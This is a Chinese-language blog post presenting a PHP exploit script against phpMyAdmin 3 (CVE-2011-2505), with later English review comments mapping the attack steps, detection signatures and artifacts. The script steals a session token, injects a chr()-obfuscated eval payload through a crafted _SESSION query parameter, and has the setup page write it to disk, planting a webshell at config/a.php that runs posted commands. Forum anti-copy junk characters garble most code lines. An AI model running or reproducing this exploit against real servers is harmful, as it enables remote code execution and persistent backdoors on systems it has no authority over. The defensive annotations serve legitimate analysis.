最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp,由于我搞得晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。

在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:

#!/usr/bin/php# G V! M7 a9 H' t- a4 c! ]
<?php/ v! c- d% z9 N$ z' }5 K M9 R
// NOTE(review): this listing was copied from a forum page that interleaves
// anti-copy junk characters into most lines; it is kept verbatim here for
// analysis of the attack chain and of the artifacts it leaves, not as runnable code.
// The chain, as written below: (1) probe config/, (2) read the session id and token
// from index.php, (3) push a crafted key into the server-side session through a
// _SESSION[...] query parameter (CVE-2011-2505, the id in the banner below),
// (4) ask setup/config.php to save that session's ConfigFile to disk,
// (5) verify by fetching config/config.inc.php.
// Precondition named by the author: the "config" directory exists and is writable.
// Removing (or denying writes to) config/ after setup is what breaks this chain.
print_r('
; H, n( p- @: G$ F+ c' F# t+---------------------------------------------------------------------------+% B: P# K8 o/ w# d
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
* [; }$ V3 W, ]6 D @. q" Q2 }by oldjun(www.oldjun.com)6 g- W' |7 p: L
welcome to www.t00ls.net! W' e* }1 ]# x
mail: [email protected]
) T0 J+ y( m4 N4 m6 AAssigned CVE id: CVE-2011-25053 B* j1 w a; w& f* r* e; U
+---------------------------------------------------------------------------+
2 ~- O$ r( |2 O& F* f! @');8 \0 r, p' P, w% h r
5 ~- V) u8 S: u; L/**1 [, E* p( W# e$ m
* working when the directory:"config" exists and is writeable.
- S. s& j$ [5 a* }**/
- p- X* ]4 {* A g# k
// Usage check: exactly two positional arguments, the target host and the pma3 base path.
; I5 v& j& X1 k) b* l+ {) B9 ?if ($argc < 3) {1 r3 R& i% v0 h/ E- ?
print_r('& C, U6 N; H. M4 e0 F/ b+ [$ @
+---------------------------------------------------------------------------+7 V* Q" D! |, Q$ p
Usage: php '.$argv[0].' host path
4 E5 ^% t. `. Z4 a4 R" a) H: Uhost: target server (ip/hostname)7 T2 r3 C9 A" o1 Q; y9 s
path: path to pma3
+ i" X. | e) kExample:# T/ d. j1 _- I% u6 M
php '.$argv[0].' localhost /pma/
! ?# k1 N" |& b- D5 h& m; o+---------------------------------------------------------------------------+
4 r) @- M' c+ F/ m" T1 `');
$ W( ]; [( ]' a! _; Z exit;
3 P/ ~2 d, n9 f}( u2 Z/ E$ e% u# @
// $host and $path are read as globals by php_request() further down.
0 c- B: Q. H, a$ t$host = $argv[1];; t7 |2 `- C# ^9 T4 E- k
$path = $argv[2];0 ?% t* b% h* t# i
// Step 1: the only "exists" test is the absence of the substring '404' anywhere in
// the raw response (status line, headers or body); 403/301 answers pass this check.
2 y- y1 Z9 C2 N* ^' {4 L6 s" z+ R/**
+ P/ N3 x3 M- G8 y! j! ?0 M * Try to determine if the directory:"config" exists9 |) Q! f0 T/ _# q: _; D
**/+ z* n2 N, H. Y: d) E
echo "[+] Try to determine if the directory:config exists....\n";
* G( }; e8 e: ~! Q* s/ r$returnstr=php_request('config/');! }# X6 I2 ~4 T j
if(strpos($returnstr,'404')){5 K) d& S+ j* u; P6 n/ M4 h
exit("[-] Exploit Failed! The directory:config do not exists!\n");) D2 E0 [5 D+ ?2 D
}: F. y7 D/ J2 i; R& T
// Step 2: index.php is fetched unauthenticated; the regex pulls the phpMyAdmin
// session id (32-40 word chars) and the 32-char token out of the returned HTML.
// Both are reused: the token is echoed back in every later request and the
// session id is sent as the phpMyAdmin cookie.
1 N3 Q9 c/ _: {/**' D* J+ ?8 Y, |& w O6 {
* Try to get token and sessionid
3 ` Q2 l. J* s3 o4 I5 _0 y**/
. _2 T& _. ?& s; e- xecho "[+] Try to get token and sessionid....\n";
& i+ P) C; s0 `" [# L& }8 Y) c$result=php_request('index.php');- `# |( i+ B: r2 m+ C/ R
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
7 r3 P3 z0 D# u9 B- A$token=$resp[3];
; l8 I- o) e' w1 N5 [- t) {* R$sessionid=$resp[1];/ D! m# V O9 D& ~: l
if($token && $sessionid){5 R. [0 W& ?" i" H
echo "[+] tokentoken\n";
9 W6 t% {6 I: `6 c _ h7 e echo "[+] Session IDsessionid\n";
: v4 p1 [( s8 P- {1 G. N}else{
6 n" M6 I* T) T# v3 P exit("[-] Can't get token and Session ID,Exploit Failed!\n");
) s) l9 J( B3 z}
' i% K& @: W# {7 P5 |# R# J
// Step 3: the session-poisoning request. The cookie binds it to the session from
// step 2; the query string carries session_to_unset plus a
// _SESSION[ConfigFile][Servers][...] key whose *name* embeds a PHP payload.
// That payload is what later produces config/a.php (the webshell path printed at
// the end) and the 't00ls' marker that step 5 looks for.
// Detection: a request to any pma3 top-level script with "_SESSION[" in the query
// string is the distinctive signature (the author's trailing comment notes that
// almost any script in the pma3 root serves here).
# s( F5 x. [. j" E6 } y7 G/**' |3 X/ a/ H% D; F3 `
* Try to insert shell into session/ [) x0 X- O+ u* c" g( I# M
**/
; T# E& u0 w/ }- h" `2 pecho "[+] Try to insert shell into session....\n";
( `6 Q+ h/ q3 Q; `. _* Sphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here., k5 t) Y. w( L5 ~) R
( Q% V/ s0 |2 }3 q; ]
// Step 4: a POST to setup/config.php with submit_save=Save. This is the write
// primitive: the setup page is expected to persist the session's ConfigFile into
// config/config.inc.php, poisoned Servers key included (inferred from the check in
// step 5 -- the setup code itself is not on this page).
/**: a; }- C3 |) P2 Q/ Z+ I
* Try to create webshell
$ @, V1 m' h* b" k( ?: P**/
( D; X! p( A1 F1 p& zecho "[+] Try to create webshell....\n";
& B2 e9 N W# t! N' Ephp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
// Step 5: success is judged by the marker 't00ls' appearing when
// config/config.inc.php is fetched. Artifacts on a compromised host: a modified
// config/config.inc.php containing 't00ls', and a new file config/a.php.
// Web-log entries matching steps 3 and 4 are the corresponding request-side evidence.
3 W% H. q6 X& Z4 k0 G/**7 A0 k2 Z9 e: v$ \8 s. g3 l
* Try to check if the webshell was created successfully7 z7 f6 m- q! E
**/# C# L$ o: w! d2 V! _/ ~" r
echo "[+] Try to check if the webshell was created successfully....\n";% @8 B$ V( Z' r. F
$content=php_request('config/config.inc.php');. m* J. m0 \$ h, Y
if(strpos($content,'t00ls')){" ?" `# N6 |* ?3 A" M5 k
echo "[+] Congratulations! Expoilt successfully....\n";
' K4 u) t3 ^6 F, D' b' K echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";/ C3 A) Z: w1 h; x3 U3 s
}else{
3 E) T1 {5 @4 z, @: X2 M exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");; _& x& t q7 ]6 k3 t: A
}
: s( l+ u' S0 T, L9 a$ ^
/**
 * Minimal raw-socket HTTP/1.1 client used by the steps above.
 *
 * @param string $url    path relative to $path (the pma3 base path from argv)
 * @param string $data   urlencoded body; non-empty => POST, empty => GET
 * @param string $cookie raw Cookie header value, sent only when non-empty
 * @return string        the full raw response (status line, headers and body)
 *
 * Reads $host and $path from globals. Connects to port 80 only (plain TCP, no TLS,
 * no timeout, no port override) and reads until the server closes the connection.
 * On connect failure it prints a message and die()s instead of returning, so
 * callers never see a transport error. The truthiness tests on $data and $cookie
 * mean a body of "0" would be sent as a GET; irrelevant for the fixed bodies here.
 */
1 G- q: U4 a+ x/ ~7 D ~3 nfunction php_request($url,$data='',$cookie=''){
/ | V# ]# q7 B5 M global $host, $path;
! w3 h2 e# c' u/ b; y: ]
// A non-empty body selects POST; the same test gates the two body headers below.
( }7 [5 v& }: J $method=$data?'POST':'GET';# |# |/ H7 Z) k
* c% G9 U! b* t' B$ L# R, x3 s% | $packet = $method." ".$path.$url." HTTP/1.1\r\n";
0 W/ b( Z" X- ~- A/ {6 e* Z $packet .= "Accept: */*\r\n";
: y' h9 o# S- W; K $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";5 S0 \- G7 c% X) @
$packet .= "Host: $host\r\n";
9 H7 {$ d1 S1 i- k+ e \! a* } $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";, y! L" A4 v9 E: q4 i: Q" i% H
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";4 H& U* h# A: I+ G8 n
$packet .= $cookie?"Cookie: $cookie\r\n":"";
// "Connection: Close" is what makes the read loop below terminate at EOF.
$ j1 K" f) y# Y+ f $packet .= "Connection: Close\r\n\r\n";4 { T6 b* B. ^
$packet .= $data?$data:"";
6 b) [8 U1 ^1 W9 P
// Hostname is resolved once here; port 80 is hard-coded.
: X6 n/ ~! O6 o' a( u+ N4 n $fp = fsockopen(gethostbyname($host), 80);5 n" g& Q* d# M, B0 Z5 n
if (!$fp) {
/ u5 @* u# V- Q* U% G+ c echo 'No response from '.$host; die;
8 ?( F0 E4 E+ c+ P }$ d1 p: Q: [* O. K& ?' b
fputs($fp, $packet);
, P5 a2 m c% O9 X
' u; }7 n0 k8 e5 Q" a+ G E $resp = '';
* [6 S7 y* g+ j# O! ]4 `, {$ r) y, v
// Accumulates the raw response in 1 KiB chunks until the peer closes.
) Z6 x: ?0 Y1 @2 ?/ y3 o/ h7 j while ($fp && !feof($fp))" w* Z7 O2 S5 [- p
$resp .= fread($fp, 1024);
- I0 K* |: g* H5 I. f+ Z8 k, I, S1 b2 q3 Z& M
return $resp;
( d' B W2 \" u}2 z; n, \% r0 z
, u! Y' V# J& T. A6 C% T$ S
?>
; N9 p: k A5 s, w" n. |